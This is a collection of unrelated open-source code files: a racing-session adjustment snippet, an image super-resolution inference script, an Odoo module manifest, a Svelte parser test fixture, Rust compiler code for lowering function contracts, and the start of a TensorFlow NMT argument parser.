session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name) &
(where('type') == 'non_droppable')
)
session_adjustments.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'driver_name': driver_name,
'type': 'non_droppable',
'reason': reason
}
)
def clear_adjustments_for_driver(self, driver):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name)
) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import print_function
import sys
import cv2
import os
import numpy as np
import cPickle as pickle
import timeit
import time
from argparse import ArgumentParser
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils, Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
if __name__ == '__main__':
""" Pre setup """
# Get params (Arguments)
parser = ArgumentParser(description='SeRanet inference')
parser.add_argument('input', help='input file path')
parser.add_argument('output', nargs='?', default=None,
help='output file path. If not specified, output image will be saved same location with input file')
parser.add_argument('--gpu', '-g', type=int, default=-1, help='GPU ID (negative value indicates CPU)')
parser.add_argument('--arch', '-a', default='seranet_v1',
help='model selection (basic_cnn_small, '
'seranet_v1)')
parser.add_argument('--color', '-c', default='rgb', help='application scheme for input/output color: (yonly, rgb)')
args = parser.parse_args()
filepath = os.path.dirname(os.path.realpath(__file__))
#DEBUG
#args.input = os.path.join(filepath, '../assets/compare/4/photo4_xinput.jpg')
#args.output = os.path.join(filepath, '../assets/compare/4/seranet_v1.jpg')
input_file_path = args.input
if not os.path.exists(input_file_path):
raise ValueError('input file ', os.path.dirname(input_file_path), ' not exist')
if args.output == None:
file_name_with_ext = os.path.basename(args.input) # returns filename from path
filename_wo_ext, ext = os.path.splitext(file_name_with_ext)
output_file_path = os.path.join(os.path.dirname(args.input), filename_wo_ext + '-seranet.jpg')
conventional_file_path = os.path.join(os.path.dirname(args.input), filename_wo_ext + '-conventional.jpg')
else:
file_name_with_ext = os.path.basename(args.output) # returns filename from path
filename_wo_ext, ext = os.path.splitext(file_name_with_ext)
output_file_path = args.output
conventional_file_path = os.path.join(os.path.dirname(args.output), filename_wo_ext + '-conventional.jpg')
output_file_dir = os.path.dirname(output_file_path)
if not os.path.exists(output_file_dir):
os.mkdir(output_file_dir)
print('output file directory ', output_file_dir, ' not exist, created automatically')
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
if args.color == 'yonly':
inout_ch = 1
elif args.color == 'rgb':
inout_ch = 3
else:
raise ValueError('Invalid color training scheme')
# Prepare model
print('prepare model')
if args.arch == 'basic_cnn_tail':
import arch.basic_cnn_tail as model_arch
model = model_arch.basic_cnn_tail(inout_ch=inout_ch)
elif args.arch == 'basic_cnn_middle':
import arch.basic_cnn_middle as model_arch
model = model_arch.basic_cnn_middle(inout_ch=inout_ch)
elif args.arch == 'basic_cnn_head':
import arch.basic_cnn_head as model_arch
model = model_arch.basic_cnn_head(inout_ch=inout_ch)
elif args.arch == 'basic_cnn_small':
import arch.basic_cnn_small as model_arch
model = model_arch.basic_cnn_small(inout_ch=inout_ch)
elif args.arch == 'seranet':
import arch.seranet_split as model_arch
model = model_arch.seranet_split(inout_ch=inout_ch)
elif args.arch == 'seranet_v1':
import arch.seranet_v1 as model_arch
model = model_arch.seranet_v1(inout_ch=inout_ch)
else:
raise ValueError('Invalid architecture name')
arch_folder = model_arch.arch_folder
# Directory/File setting for output
output_folder = os.path.join(arch_folder, args.color, 'output')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
#os.chdir(output_folder)
inference_log_file_name = 'inference.log'
inference_log_file = open(os.path.join(output_folder, inference_log_file_name), 'w')
""" Model setup """
print('setup model')
model_load_path = os.path.join(arch_folder, args.color, 'training_process', 'my.model')
serializers.load_npz(model_load_path, model)
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
model.train = False
""" Load data """
print('loading data')
input_img = cv2.imread(input_file_path, cv2.IMREAD_COLOR)
print('upscaling to ', output_file_path)
if args.color == 'rgb':
input_img = np.transpose(input_img[:, :, :], (2, 0, 1))
input_img = input_img / 255.0 # Must be handled as float
input_img = input_img.reshape((1, input_img.shape[0], input_img.shape[1], input_img.shape[2]))
x_data = model.preprocess_x(input_img)
x = Variable(xp.asarray(x_data), volatile='on')
output_img = model(x)
if (args.gpu >= 0):
output_data = cuda.cupy.asnumpy(output_img.data)
else:
output_data = output_img.data
output_img = output_data[0].transpose(1, 2, 0) * 255.
elif args.color == 'yonly':
ycc_input_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2YCR_CB)
y_input_img = np.transpose(ycc_input_img[:, :, 0:1], (2, 0, 1))
y_input_img = y_input_img / 255.0 # Must be handled as float
y_input_img = y_input_img.reshape((1, y_input_img.shape[0], y_input_img.shape[1], y_input_img.shape[2]))
x_data = model.preprocess_x(y_input_img)
x = Variable(xp.asarray(x_data), volatile='on')
output_y_img = model(x)
if (args.gpu >= 0):
output_y_data = cuda.cupy.asnumpy(output_y_img.data)
else:
output_y_data = output_y_img.data
input_image_height = input_img.shape[0]
input_image_width = input_img.shape[1]
output_image_height = 2 * input_image_height
output_image_width = 2 * input_image_width
scaled_input_img = cv2.resize(input_img, (output_image_width, output_image_height),
interpolation=cv2.INTER_LANCZOS4)
ycc_scaled_input_img = cv2.cvtColor(scaled_input_img, cv2.COLOR_BGR2YCR_CB)
ycc_scaled_input_img[:, :, 0:1] = output_y_data[0].transpose(1, 2, 0) * 255. # (width, height, ch)
output_img = cv2.cvtColor(ycc_scaled_input_img, cv2.COLOR_YCR_CB2BGR)
print('saved to ', output_file_path)
cv2.imwrite(output_file_path, output_img) | unknown | codeparrot/codeparrot-clean | ||
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'CSV Import order wizard',
'version': '0.1',
'category': 'ETL',
'description': '''
Import wizard for import inventory product.
''',
'author': 'Micronaet S.r.l. - Nicola Riolini',
'website': 'http://www.micronaet.it',
'license': 'AGPL-3',
'depends': [
'base',
'product',
'base_log',
'sale',
'purchase',
],
'init_xml': [],
'demo': [],
'data': [
'data/mode_data.xml',
'order_views.xml',
],
'active': False,
'installable': True,
'auto_install': False,
} | unknown | codeparrot/codeparrot-clean | ||
{
"html": {
"type": "Fragment",
"start": 0,
"end": 117,
"children": [
{
"type": "Element",
"start": 0,
"end": 117,
"name": "textarea",
"attributes": [],
"children": [
{
"start": 10,
"end": 50,
"type": "Text",
"raw": "\n\t<p>not actu </textar ally an element. ",
"data": "\n\t<p>not actu </textar ally an element. "
},
{
"type": "MustacheTag",
"start": 50,
"end": 55,
"expression": {
"type": "Identifier",
"start": 51,
"end": 54,
"loc": {
"start": {
"line": 2,
"column": 40
},
"end": {
"line": 2,
"column": 43
}
},
"name": "foo"
}
},
{
"start": 55,
"end": 91,
"type": "Text",
"raw": "</p>\n</textare\n\n\n> </textaread >asdf",
"data": "</p>\n</textare\n\n\n> </textaread >asdf"
}
]
}
]
}
} | json | github | https://github.com/sveltejs/svelte | packages/svelte/tests/parser-legacy/samples/textarea-end-tag/output.json |
use std::sync::Arc;
use thin_vec::thin_vec;
use crate::LoweringContext;
impl<'a, 'hir> LoweringContext<'a, 'hir> {
/// Lowered contracts are guarded with the `contract_checks` compiler flag,
/// i.e. the flag turns into a boolean guard in the lowered HIR. The reason
/// for not eliminating the contract code entirely when the `contract_checks`
/// flag is disabled is so that contracts can be type checked, even when
/// they are disabled, which avoids them becoming stale (i.e. out of sync
/// with the codebase) over time.
///
/// The optimiser should be able to eliminate all contract code guarded
/// by `if false`, leaving the original body intact when runtime contract
/// checks are disabled.
pub(super) fn lower_contract(
&mut self,
body: impl FnOnce(&mut Self) -> rustc_hir::Expr<'hir>,
contract: &rustc_ast::FnContract,
) -> rustc_hir::Expr<'hir> {
// The order in which things are lowered is important! I.e to
// refer to variables in contract_decls from postcond/precond,
// we must lower it first!
let contract_decls = self.lower_decls(contract);
match (&contract.requires, &contract.ensures) {
(Some(req), Some(ens)) => {
// Lower the fn contract, which turns:
//
// { body }
//
// into:
//
// let __postcond = if contract_checks {
// CONTRACT_DECLARATIONS;
// contract_check_requires(PRECOND);
// Some(|ret_val| POSTCOND)
// } else {
// None
// };
// {
// let ret = { body };
//
// if contract_checks {
// contract_check_ensures(__postcond, ret)
// } else {
// ret
// }
// }
let precond = self.lower_precond(req);
let postcond_checker = self.lower_postcond_checker(ens);
let contract_check = self.lower_contract_check_with_postcond(
contract_decls,
Some(precond),
postcond_checker,
);
let wrapped_body =
self.wrap_body_with_contract_check(body, contract_check, postcond_checker.span);
self.expr_block(wrapped_body)
}
(None, Some(ens)) => {
// Lower the fn contract, which turns:
//
// { body }
//
// into:
//
// let __postcond = if contract_checks {
// Some(|ret_val| POSTCOND)
// } else {
// None
// };
// {
// let ret = { body };
//
// if contract_checks {
// CONTRACT_DECLARATIONS;
// contract_check_ensures(__postcond, ret)
// } else {
// ret
// }
// }
let postcond_checker = self.lower_postcond_checker(ens);
let contract_check =
self.lower_contract_check_with_postcond(contract_decls, None, postcond_checker);
let wrapped_body =
self.wrap_body_with_contract_check(body, contract_check, postcond_checker.span);
self.expr_block(wrapped_body)
}
(Some(req), None) => {
// Lower the fn contract, which turns:
//
// { body }
//
// into:
//
// {
// if contracts_checks {
// CONTRACT_DECLARATIONS;
// contract_requires(PRECOND);
// }
// body
// }
let precond = self.lower_precond(req);
let precond_check = self.lower_contract_check_just_precond(contract_decls, precond);
let body = self.arena.alloc(body(self));
// Flatten the body into precond check, then body.
let wrapped_body = self.block_all(
body.span,
self.arena.alloc_from_iter([precond_check].into_iter()),
Some(body),
);
self.expr_block(wrapped_body)
}
(None, None) => body(self),
}
}
fn lower_decls(&mut self, contract: &rustc_ast::FnContract) -> &'hir [rustc_hir::Stmt<'hir>] {
let (decls, decls_tail) = self.lower_stmts(&contract.declarations);
if let Some(e) = decls_tail {
// include the tail expression in the declaration statements
let tail = self.stmt_expr(e.span, *e);
self.arena.alloc_from_iter(decls.into_iter().map(|d| *d).chain([tail].into_iter()))
} else {
decls
}
}
/// Lower the precondition check intrinsic.
fn lower_precond(&mut self, req: &Box<rustc_ast::Expr>) -> rustc_hir::Stmt<'hir> {
let lowered_req = self.lower_expr_mut(&req);
let req_span = self.mark_span_with_reason(
rustc_span::DesugaringKind::Contract,
lowered_req.span,
Some(Arc::clone(&self.allow_contracts)),
);
let precond = self.expr_call_lang_item_fn_mut(
req_span,
rustc_hir::LangItem::ContractCheckRequires,
&*arena_vec![self; lowered_req],
);
self.stmt_expr(req.span, precond)
}
fn lower_postcond_checker(
&mut self,
ens: &Box<rustc_ast::Expr>,
) -> &'hir rustc_hir::Expr<'hir> {
let ens_span = self.lower_span(ens.span);
let ens_span = self.mark_span_with_reason(
rustc_span::DesugaringKind::Contract,
ens_span,
Some(Arc::clone(&self.allow_contracts)),
);
let lowered_ens = self.lower_expr_mut(&ens);
self.expr_call_lang_item_fn(
ens_span,
rustc_hir::LangItem::ContractBuildCheckEnsures,
&*arena_vec![self; lowered_ens],
)
}
fn lower_contract_check_just_precond(
&mut self,
contract_decls: &'hir [rustc_hir::Stmt<'hir>],
precond: rustc_hir::Stmt<'hir>,
) -> rustc_hir::Stmt<'hir> {
let stmts = self
.arena
.alloc_from_iter(contract_decls.into_iter().map(|d| *d).chain([precond].into_iter()));
let then_block_stmts = self.block_all(precond.span, stmts, None);
let then_block = self.arena.alloc(self.expr_block(&then_block_stmts));
let precond_check = rustc_hir::ExprKind::If(
self.arena.alloc(self.expr_bool_literal(precond.span, self.tcx.sess.contract_checks())),
then_block,
None,
);
let precond_check = self.expr(precond.span, precond_check);
self.stmt_expr(precond.span, precond_check)
}
fn lower_contract_check_with_postcond(
&mut self,
contract_decls: &'hir [rustc_hir::Stmt<'hir>],
precond: Option<rustc_hir::Stmt<'hir>>,
postcond_checker: &'hir rustc_hir::Expr<'hir>,
) -> &'hir rustc_hir::Expr<'hir> {
let stmts = self
.arena
.alloc_from_iter(contract_decls.into_iter().map(|d| *d).chain(precond.into_iter()));
let span = match precond {
Some(precond) => precond.span,
None => postcond_checker.span,
};
let postcond_checker = self.arena.alloc(self.expr_enum_variant_lang_item(
postcond_checker.span,
rustc_hir::lang_items::LangItem::OptionSome,
&*arena_vec![self; *postcond_checker],
));
let then_block_stmts = self.block_all(span, stmts, Some(postcond_checker));
let then_block = self.arena.alloc(self.expr_block(&then_block_stmts));
let none_expr = self.arena.alloc(self.expr_enum_variant_lang_item(
postcond_checker.span,
rustc_hir::lang_items::LangItem::OptionNone,
Default::default(),
));
let else_block = self.block_expr(none_expr);
let else_block = self.arena.alloc(self.expr_block(else_block));
let contract_check = rustc_hir::ExprKind::If(
self.arena.alloc(self.expr_bool_literal(span, self.tcx.sess.contract_checks())),
then_block,
Some(else_block),
);
self.arena.alloc(self.expr(span, contract_check))
}
fn wrap_body_with_contract_check(
&mut self,
body: impl FnOnce(&mut Self) -> rustc_hir::Expr<'hir>,
contract_check: &'hir rustc_hir::Expr<'hir>,
postcond_span: rustc_span::Span,
) -> &'hir rustc_hir::Block<'hir> {
let check_ident: rustc_span::Ident =
rustc_span::Ident::from_str_and_span("__ensures_checker", postcond_span);
let (check_hir_id, postcond_decl) = {
// Set up the postcondition `let` statement.
let (checker_pat, check_hir_id) = self.pat_ident_binding_mode_mut(
postcond_span,
check_ident,
rustc_hir::BindingMode::NONE,
);
(
check_hir_id,
self.stmt_let_pat(
None,
postcond_span,
Some(contract_check),
self.arena.alloc(checker_pat),
rustc_hir::LocalSource::Contract,
),
)
};
// Install contract_ensures so we will intercept `return` statements,
// then lower the body.
self.contract_ensures = Some((postcond_span, check_ident, check_hir_id));
let body = self.arena.alloc(body(self));
// Finally, inject an ensures check on the implicit return of the body.
let body = self.inject_ensures_check(body, postcond_span, check_ident, check_hir_id);
// Flatten the body into precond, then postcond, then wrapped body.
let wrapped_body = self.block_all(
body.span,
self.arena.alloc_from_iter([postcond_decl].into_iter()),
Some(body),
);
wrapped_body
}
/// Create an `ExprKind::Ret` that is optionally wrapped by a call to check
/// a contract ensures clause, if it exists.
pub(super) fn checked_return(
&mut self,
opt_expr: Option<&'hir rustc_hir::Expr<'hir>>,
) -> rustc_hir::ExprKind<'hir> {
let checked_ret =
if let Some((check_span, check_ident, check_hir_id)) = self.contract_ensures {
let expr = opt_expr.unwrap_or_else(|| self.expr_unit(check_span));
Some(self.inject_ensures_check(expr, check_span, check_ident, check_hir_id))
} else {
opt_expr
};
rustc_hir::ExprKind::Ret(checked_ret)
}
/// Wraps an expression with a call to the ensures check before it gets returned.
pub(super) fn inject_ensures_check(
&mut self,
expr: &'hir rustc_hir::Expr<'hir>,
span: rustc_span::Span,
cond_ident: rustc_span::Ident,
cond_hir_id: rustc_hir::HirId,
) -> &'hir rustc_hir::Expr<'hir> {
// {
// let ret = { body };
//
// if contract_checks {
// contract_check_ensures(__postcond, ret)
// } else {
// ret
// }
// }
let ret_ident: rustc_span::Ident = rustc_span::Ident::from_str_and_span("__ret", span);
// Set up the return `let` statement.
let (ret_pat, ret_hir_id) =
self.pat_ident_binding_mode_mut(span, ret_ident, rustc_hir::BindingMode::NONE);
let ret_stmt = self.stmt_let_pat(
None,
span,
Some(expr),
self.arena.alloc(ret_pat),
rustc_hir::LocalSource::Contract,
);
let ret = self.expr_ident(span, ret_ident, ret_hir_id);
let cond_fn = self.expr_ident(span, cond_ident, cond_hir_id);
let contract_check = self.expr_call_lang_item_fn_mut(
span,
rustc_hir::LangItem::ContractCheckEnsures,
arena_vec![self; *cond_fn, *ret],
);
let contract_check = self.arena.alloc(contract_check);
let call_expr = self.block_expr_block(contract_check);
// same ident can't be used in 2 places, so we create a new one for the
// else branch
let ret = self.expr_ident(span, ret_ident, ret_hir_id);
let ret_block = self.block_expr_block(ret);
let contracts_enabled: rustc_hir::Expr<'_> =
self.expr_bool_literal(span, self.tcx.sess.contract_checks());
let contract_check = self.arena.alloc(self.expr(
span,
rustc_hir::ExprKind::If(
self.arena.alloc(contracts_enabled),
call_expr,
Some(ret_block),
),
));
let attrs: rustc_ast::AttrVec = thin_vec![self.unreachable_code_attr(span)];
self.lower_attrs(contract_check.hir_id, &attrs, span, rustc_hir::Target::Expression);
let ret_block = self.block_all(span, arena_vec![self; ret_stmt], Some(contract_check));
self.arena.alloc(self.expr_block(self.arena.alloc(ret_block)))
}
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_ast_lowering/src/contract.rs |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow NMT model implementation."""
from __future__ import print_function
import argparse
import os
import random
import sys
import numpy as np
from px.nmt import inference
from px.nmt import train_combined as train
from px.nmt.utils import vocab_utils
import tensorflow as tf
from third_party.nmt.utils import evaluation_utils
from third_party.nmt.utils import misc_utils as utils
utils.check_tensorflow_version()
FLAGS = None
def add_arguments(parser):
"""Build ArgumentParser."""
parser.register("type", "bool", lambda v: v.lower() == "true")
# network
parser.add_argument("--num_units", type=int, default=32, help="Network size.")
parser.add_argument(
"--num_layers", type=int, default=2, help="Network depth.")
parser.add_argument(
"--num_encoder_layers",
type=int,
default=None,
help="Encoder depth, equal to num_layers if None.")
parser.add_argument(
"--num_decoder_layers",
type=int,
default=None,
help="Decoder depth, equal to num_layers if None.")
parser.add_argument(
"--encoder_type",
type=str,
default="uni",
help="""\
uni | bi | gnmt.
For bi, we build num_encoder_layers/2 bi-directional layers.
For gnmt, we build 1 bi-directional layer, and (num_encoder_layers - 1)
uni-directional layers.\
""")
parser.add_argument(
"--residual",
type="bool",
nargs="?",
const=True,
default=False,
help="Whether to add residual connections.")
parser.add_argument(
"--num_embeddings_partitions",
type=int,
default=2,
help="Number of partitions for embedding vars.")
# attention mechanisms
parser.add_argument(
"--attention",
type=str,
default="",
help="""\
luong | scaled_luong | bahdanau | normed_bahdanau or set to "" for no
attention\
""")
parser.add_argument(
"--attention_architecture",
type=str,
default="standard",
help="""\
standard | gnmt | gnmt_v2.
standard: use top layer to compute attention.
gnmt: GNMT style of computing attention, use previous bottom layer to
compute attention.
gnmt_v2: similar to gnmt, but use current bottom layer to compute
attention.\
""")
parser.add_argument(
"--output_attention",
type="bool",
nargs="?",
const=True,
default=True,
help="""\
Only used in standard attention_architecture. Whether use attention as
the cell output at each timestep.
.\
""")
parser.add_argument(
"--pass_hidden_state",
type="bool",
nargs="?",
const=True,
default=True,
help="""\
Whether to pass encoder's hidden state to decoder when using an attention
based model.\
""")
# optimizer
parser.add_argument(
"--optimizer",
type=str,
default="sgd",
help="sgd | adam | rmsprop | adadelta")
parser.add_argument(
"--learning_rate",
type=float,
default=1.0,
help="Learning rate. Adam: 0.001 | 0.0001")
parser.add_argument(
"--warmup_steps",
type=int,
default=0,
help="How many steps we inverse-decay learning.")
parser.add_argument(
"--warmup_scheme",
type=str,
default="t2t",
help="""\
How to warmup learning rates. Options include:
t2t: Tensor2Tensor's way, start with lr 100 times smaller, then
exponentiate until the specified lr.\
""")
parser.add_argument(
"--decay_scheme",
type=str,
default="",
help="""\
How we decay learning rate. Options include:
luong234: after 2/3 num train steps, we start halving the learning rate
for 4 times before finishing.
luong10: after 1/2 num train steps, we start halving the learning rate
for 10 times before finishing.\
""")
parser.add_argument(
"--num_train_steps", type=int, default=12000, help="Num steps to train.")
parser.add_argument(
"--colocate_gradients_with_ops",
type="bool",
nargs="?",
const=True,
default=True,
help=("Whether try colocating gradients with "
"corresponding op"))
# initializer
parser.add_argument(
"--init_op",
type=str,
default="uniform",
help="uniform | glorot_normal | glorot_uniform")
parser.add_argument(
"--init_weight",
type=float,
default=0.1,
help=("for uniform init_op, initialize weights "
"between [-this, this]."))
# data
parser.add_argument(
"--src", type=str, default=None, help="Source suffix, e.g., en.")
parser.add_argument(
"--tgt", type=str, default=None, help="Target suffix, e.g., de.")
parser.add_argument(
"--ctx", type=str, default=None, help="Source context suffix, e.g., ctx.")
parser.add_argument(
"--train_prefix",
type=str,
default=None,
help="Train prefix, expect files with src/tgt suffixes.")
parser.add_argument(
"--dev_prefix",
type=str,
default=None,
help="Dev prefix, expect files with src/tgt suffixes.")
parser.add_argument(
"--test_prefix",
type=str,
default=None,
help="Test prefix, expect files with src/tgt suffixes.")
parser.add_argument(
"--train_annotations",
type=str,
default=None,
help="Train annotations file.")
parser.add_argument(
"--dev_annotations", type=str, default=None, help="Dev annotations file.")
parser.add_argument(
"--test_annotations",
type=str,
default=None,
help="Test annotations file.")
parser.add_argument(
"--out_dir", type=str, default=None, help="Store log/model files.")
# Vocab
parser.add_argument(
"--vocab_prefix",
type=str,
default=None,
help="""\
Vocab prefix, expect files with src/tgt suffixes.\
""")
parser.add_argument(
"--embed_prefix",
type=str,
default=None,
help="""\
Pretrained embedding prefix, expect files with src/tgt suffixes.
The embedding files should be Glove formatted txt files.\
""")
parser.add_argument(
"--sos", type=str, default="<s>", help="Start-of-sentence symbol.")
parser.add_argument(
"--eos", type=str, default="</s>", help="End-of-sentence symbol.")
parser.add_argument(
"--share_vocab",
type="bool",
nargs="?",
const=True,
default=False,
help="""\
Whether to use the source vocab and embeddings for both source and
target.\
""")
parser.add_argument(
"--check_special_token",
type="bool",
default=True,
help="""\
Whether check special sos, eos, unk tokens exist in the
vocab files.\
""")
# Sequence lengths
parser.add_argument(
"--src_max_len",
type=int,
default=50,
help="Max length of src sequences during training.")
parser.add_argument(
"--tgt_max_len",
type=int,
default=50,
help="Max length of tgt sequences during training.")
parser.add_argument(
"--src_max_len_infer",
type=int,
default=None,
help="Max length of src sequences during inference.")
parser.add_argument(
"--tgt_max_len_infer",
type=int,
default=None,
help="""\
Max length of tgt sequences during inference. Also use to restrict the
maximum decoding length.\
""")
# Context
parser.add_argument(
"--context_vector",
type=str,
default="",
help="""\
Method to produce context vector
append | bilstm_pool | bilstm_last or set to "" if there is no context
append: do string append of context and source. context_feed must be set
to append. Delimiter is defined with --context_delimiter.
bilstm_full: encode context with bi-LSTM, then send all encoder outputs.
only works with context_feed = encoder_output
bilstm_pool: encode context with bi-LSTM, then maxpool over the top layer.
bilstm_last: encode context with bi-LSTM,
then use top layer's last output.
cnn: Do a 4 layers CNN
last_state: Send the LSTM hidden state to the decoder initial state.
only works with context_feed = decoder_hidden_state
\
""")
parser.add_argument(
"--context_feed",
type=str,
default="",
help="""\
Method to feed the context into the model
append | encoder_output | decoder_hidden_state
or set to "" if there is no context
append: do string append of context and source. contex vector must be set
to append. Delimiter is defined with --context_delimiter.
encoder_output : concat the context vector to the source encoder output.
decoder_hidden_state : pass the context vector to
the decoder initial hidden state.
\
""")
parser.add_argument(
"--context_delimiter",
type=str,
default="<ctx>",
help="A delimiter when appending context and source.")
# Default settings works well (rarely need to change)
parser.add_argument(
"--unit_type",
type=str,
default="lstm",
help="lstm | gru | layer_norm_lstm | nas")
parser.add_argument(
"--forget_bias",
type=float,
default=1.0,
help="Forget bias for BasicLSTMCell.")
parser.add_argument(
"--dropout", type=float, default=0.2, help="Dropout rate (not keep_prob)")
parser.add_argument(
"--max_gradient_norm",
type=float,
default=5.0,
help="Clip gradients to this norm.")
parser.add_argument(
"--source_reverse",
type="bool",
nargs="?",
const=True,
default=False,
help="Reverse source sequence.")
parser.add_argument("--batch_size", type=int, default=128, help="Batch size.")
parser.add_argument(
"--steps_per_stats",
type=int,
default=100,
help=("How many training steps to do per stats logging."
"Save checkpoint every 10x steps_per_stats"))
parser.add_argument(
"--max_train",
type=int,
default=0,
help="Limit on the size of training data (0: no limit).")
parser.add_argument(
"--num_buckets",
type=int,
default=5,
help="Put data into similar-length buckets.")
# SPM
parser.add_argument(
"--subword_option",
type=str,
default="",
choices=["", "bpe", "spm"],
help="""\
Set to bpe or spm to activate subword desegmentation.\
""")
parser.add_argument(
"--subword_model",
type=str,
default=None,
help="""\
Full path to the subword model to be loaded. If None, no
subword is used.\
""")
# Misc
parser.add_argument(
"--num_gpus", type=int, default=1, help="Number of gpus in each worker.")
parser.add_argument(
"--log_device_placement",
type="bool",
nargs="?",
const=True,
default=False,
help="Debug GPU allocation.")
parser.add_argument(
"--metrics",
type=str,
default="bleu",
help=("Comma-separated list of evaluations "
"metrics (bleu,rouge,accuracy)"))
parser.add_argument(
"--steps_per_external_eval",
type=int,
default=None,
help="""\
How many training steps to do per external evaluation. Automatically set
based on data if None.\
""")
parser.add_argument(
"--steps_per_save",
type=int,
default=500,
help="How many training steps to do before saving.")
parser.add_argument(
"--scope", type=str, default=None, help="scope to put variables under")
parser.add_argument(
"--hparams_path",
type=str,
default=None,
help=("Path to standard hparams json file that overrides"
"hparams values from FLAGS."))
parser.add_argument(
"--random_seed",
type=int,
default=None,
help="Random seed (>0, set a specific seed).")
parser.add_argument(
"--override_loaded_hparams",
type="bool",
nargs="?",
const=True,
default=False,
help="Override loaded hparams with values specified")
parser.add_argument(
"--num_keep_ckpts",
type=int,
default=5,
help="Max number of checkpoints to keep.")
parser.add_argument(
"--avg_ckpts",
type="bool",
nargs="?",
const=True,
default=False,
help=("""\
Average the last N checkpoints for external evaluation.
N can be controlled by setting --num_keep_ckpts.\
"""))
parser.add_argument(
"--baseline_type",
type=int,
default=0,
help="Type of the reward baseline: "
"0: average reward per source. "
"1: use a neural (value) network. "
"2: average reward over the whole batch.")
parser.add_argument(
"--sample_id",
type=int,
default=-1,
help="ID of "
"the single sample to decode for debugging. "
"Random if negative.")
# Inference
parser.add_argument(
"--ckpt",
type=str,
default="",
help="Checkpoint file to load a model for inference.")
parser.add_argument(
"--inference_input_file",
type=str,
default=None,
help="Set to the text to decode.")
parser.add_argument(
"--inference_list",
type=str,
default=None,
help=("A comma-separated list of sentence indices "
"(0-based) to decode."))
parser.add_argument(
"--infer_batch_size",
type=int,
default=32,
help="Batch size for inference mode.")
parser.add_argument(
"--inference_output_file",
type=str,
default=None,
help="Output file to store decoding results.")
parser.add_argument(
"--inference_ref_file",
type=str,
default=None,
help=("""\
Reference file to compute evaluation scores (if provided).\
"""))
parser.add_argument(
"--infer_mode",
type=str,
default="greedy",
choices=[
"greedy",
"sample",
"beam_search",
"trie_beam_search",
"trie_sample",
"trie_greedy",
"diverse_beam_search",
],
help="Which type of decoder to use during inference.")
parser.add_argument(
"--beam_width",
type=int,
default=0,
help=("""\
beam width when using beam search decoder. If 0 (default), use standard
decoder with greedy helper.\
"""))
parser.add_argument(
"--diverse_beam_search_iterations",
type=int,
default=2,
help=("""\
Number of diverse beam search iterations to be performed. Only used
when infer_mode=diverse_beam_search. The final number of rewrites will be
diverse_beam_search_iterations * beam_width. Therefore, it must be greater
than 1 to have an effect different than standard beam search."\
"""))
parser.add_argument(
"--length_penalty_weight",
type=float,
default=0.0,
help="Length penalty for beam search.")
parser.add_argument(
"--sampling_temperature",
type=float,
default=1.0,
help=("Softmax temperature for sampling during RL, "
"0.0 means greedy decoding, values > 1.0 lead "
"to more randomness. Must be >= 0."))
parser.add_argument(
"--num_translations_per_input",
type=int,
default=1,
help=("""\
Number of translations generated for each sentence. This is only used for
inference.\
"""))
parser.add_argument(
"--trie_path",
type=str,
default=None,
help="Path to sstable file to build decoding trie. The"
" values of the saved tables should be protos of type"
" QAInstance.")
parser.add_argument("--optimize_ngrams_len", type=int, default=5,
help='Lenght of ngrams to optimize trie over.')
# Job info
parser.add_argument(
"--jobid", type=int, default=0, help="Task id of the worker.")
parser.add_argument(
"--num_workers",
type=int,
default=1,
help="Number of workers (inference only).")
parser.add_argument(
"--num_inter_threads",
type=int,
default=0,
help="number of inter_op_parallelism_threads")
parser.add_argument(
"--num_intra_threads",
type=int,
default=0,
help="number of intra_op_parallelism_threads")
# Reformulator
parser.add_argument(
"--replication_factor",
type=int,
default=1,
help="Each source is repeated this number of times. Note:"
" the overall batch size remains at batch_size, so"
" batch_size must be a multiple of replication_factor.")
parser.add_argument(
"--environment_server",
type=str,
default=None,
help="Address of the environment server.")
parser.add_argument(
"--environment_mode",
type=str,
default="searchqa",
choices=["squad", "searchqa"],
help=".")
parser.add_argument(
"--use_rl",
type=bool,
default=False,
help="If True, use REINFORCE training algorithm. If"
"False, use cross entropy loss.")
parser.add_argument(
"--entropy_regularization_weight",
type=float,
default=0.0,
help="Weight for the entropy regularization.")
parser.add_argument(
"--server_mode",
type=bool,
default=False,
help="If True, run in server mode.")
def create_hparams(flags):
"""Create training hparams."""
return tf.contrib.training.HParams(
# Data
src=flags.src,
tgt=flags.tgt,
ctx=flags.ctx,
train_prefix=flags.train_prefix,
dev_prefix=flags.dev_prefix,
test_prefix=flags.test_prefix,
train_annotations=flags.train_annotations,
dev_annotations=flags.dev_annotations,
test_annotations=flags.test_annotations,
